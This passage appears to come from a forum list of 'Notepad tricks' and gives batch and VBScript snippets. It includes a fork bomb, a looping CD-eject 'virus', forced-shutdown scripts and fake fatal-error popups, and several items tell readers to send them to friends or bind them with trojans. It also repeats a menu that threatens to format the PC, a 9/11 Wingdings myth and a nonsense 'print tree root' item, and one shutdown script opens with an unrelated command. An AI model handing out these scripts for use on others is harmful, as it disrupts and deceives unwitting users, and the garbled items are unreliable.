echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)


echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


Save it as "Anything.BAT" and send it.
==============================================================
9) Hide text inside your text file !
* Open your command prompt Start–>Run type cmd
* Move to any destination for example let us assume D:\> drive
* Type the below code in your command prompt
* D:\>notepad syshacks.txt:hidden
* syshacks notepad save
* syshacks notepad hidden
* Write some data and save the file.
* Move to D:\> and open syshacks.txt you cannot see no data in the file syshacks.txt.
* To retrieve the hidden data open command prompt and type the same command.
* D:\>notepad syshacks.txt:hidden
* Notepad will open syshacks.txt file with hidden data


==============================================================
10) A Virus That Will Open And Close Ur Cdrom
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


Save it as "Anything.vbs" and send it.
Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process
==============================================================
11) Notepad virus
Open NotePad And Write This:
Code:
@echo off
:E
start cmd.exe
start calc.exe


Save It As .bat.
==============================================================
12) Code to shutdown computer


Open NotePad And Write This:
Code:
avidemux2_cli --run j-1.js --run j-2.js --end
shutdown.exe -s -t 00
Save It As .bat
==============================================================
13) Code for log
Open NotePad And Write This:
Code:
.LOG
and Save It As .txt
now if you open the file
its writes the time and day that you log...
==============================================================
14) Code for matrix falling text-
Open NotePad And Write This:
Code:
@echo off
:loop
COlor 0A
Title J J f f g g g g
echo 0 A 0 1 1 1 A 0 1 0 1 0 7 7 8 9 9 1 0 1 0 1 A 1 0 a d d f f 1 0 8
echo 0 0 0 0 0 0 0 0 1 A 0 A 1 0 A 1 1 1 1 0 A 1 0 A 5 5 6 7 a n k k k
echo 0 1 0 1 0 A B J 0 3 4 0 1 0 1 0 1 B A A O i d d 3 3 4 4 6 7 7 g u
echo 0 2 3 1 1 1 5 5 6 5 6 8 9 5 4 5 4 5 5 4 5 5 6 4 f f f g j d g d f g d
echo 2 4 5 6 5 5 6 5 9 4 5 7 7 7 7 8 9 9 0 66 6 1 5 5 6 4 5 5 8 6 4 4 6 4
goto :loop


Save It As .bat
==============================================================
15)code to make computer chat with you
Open NotePad And Write This:
Code:
dim fname
fname=inputbox(" Hi whats your name?")
fname=inputbox("My Name Is Saplas")
fname=inputbox(" I Love You Saplas ^^.")
Save It As .vbs
==============================================================
16) Code to open many windows!
Open NotePad And Write This:
Code:
start
start
start
[The Number of "start" e.x 3 start-->3 windows ,, more start.. more windows ^_^]
Save It As .bat
==============================================================
17)code for Rick Roll
Open NotePad And Write This:
Code:
@echo off
START
http://www.smooch.net/lol [ you can change the site but i find this Site for RIck Roll-->best] [[for closing this site, push ctrl+alt+delete]]
Save It As .bat
==============================================================
18)code for Virus Joke
Open NotePad And Write This:
Code:
start
start
start
start
@echo off
msg ' [your text here] example msg ' We Hack So What?
msg ' [your text here] example msg ' Hahahahahaha.
shutdown -s -t 50 -c "your text here" example shutdown -s -t 50 -c "The Pc Gonna Exploded In 50 Sec"


Save It As .bat


If You wait 50 sec, your pc gonna restart..
But..
Start-->Run. Now Write shutdown -a
It Stops The Restart...
==============================================================
19) code for Virus Joke 2
Open NotePad And Write This:
Code:
@echo off
:hack
echo [your text here] I prefer this example --> echo Trojan Virus Uploading
goto hack
Save It As .bat
==============================================================
20) code for Adding A Heading And Text
Open Internet Explorer[prefer Mozila Firefox] .Then Open NotePad And Write This:
Code:


In The " ", It's The Name For The Site





Hello
In The " " are the font and the size number.
Example









Hello

==============================================================
21) code for make a Fork Bomb(LoL)
Open NotePad And Write This:
Code:
start
%0
goto :S


Save It As .bat
If You Open It, It Can Crash Your Pc So Send It In YOUR FRIENDS .. Not to ME ^_^ .
==============================================================
22) Create your own Never Ending Error/Pop up messages
First of all, here are some possible uses for this cool little thing
1. Bind them with your virus's / trojans. You can use any messages remember.
2. To piss off your friends making them think you've messed there computer up.
3. Whatever you want really!


Step 1. Open Notepad
Step 2. Type the following text:
Code:
lol = msgbox("Text You Want Here",16,"Title Of Message Box Here")
Step 3. Create as many lines as you want, for example my outcome would be something like this:
lol = msgbox("A System32 error has occured, please contact microsoft immediately",16,"Fatal Error")
lol = msgbox("Mswinsox (C:\Windows) Will now be deleted",16,"Fatal Error")
lol = msgbox("(C:\Windows) is being deleted",16,"Fatal Error")
lol = msgbox("Your computer will reboot shortly",16,"Fatal Error")
lol = msgbox("If you still have a problem, then you are -beep-ed",16,"Fatal Error")
lol = msgbox("owned you",16,"Fatal Error")




Step 4. Save it as Anything.vbs , distribute it amongst your friends and have a laugh.
==============================================================
23) make your pc talk with notepad!
Open a text file in notepad and write:
Code:
Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
Save the file with a (*.vbs) extension, it will create a VBScript File.
It will prompt you for a text when u open the file, input the text and press ok."
u will hear what u typed
==============================================================
Fake warning boxes:
http://www.maxcheaters.com/forum/index.php?topic=53974.0
==============================================================
Virus in notepad
Paste this in yor notepad
Code:
"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*X5O!P%@AP[4\PZX54(P^)7CC)7}" (Without Quotes)


now save it and scan it by ur antivirus software..
Bush trick
Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.
or
1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.
or
Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...
____________________________________________________________________
____________________________________________________________________
world trade centre trick
Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.


log trick !! make ur Notepad a diary !!
Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.


WHY?
The reason this happens:
In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.
1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters
************************************************************************
Changing Header and Footer
Ever printed the little text you wrote in Notepad? More often than not, the printout starts with “Untitled” or the filename at top, and “Page 1? on bottom. Want to get rid of it, or change it? Click on File, Page Setup. Get rid of the characters in Header and Footer boxes, and write what you want as Header and Footer. Use the following codes.


&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number


Print tree root
a. Open NOTEPAD and enter {print tree root}
b. After that hit enter and type C:\windows\system
c. After that hit enter and type {print C:\windows\system\winlog
d. Hit enter and type 4*43?$@[455]3hr4~
e. Then save the file as teekids in C:\windows\system.
==============================================================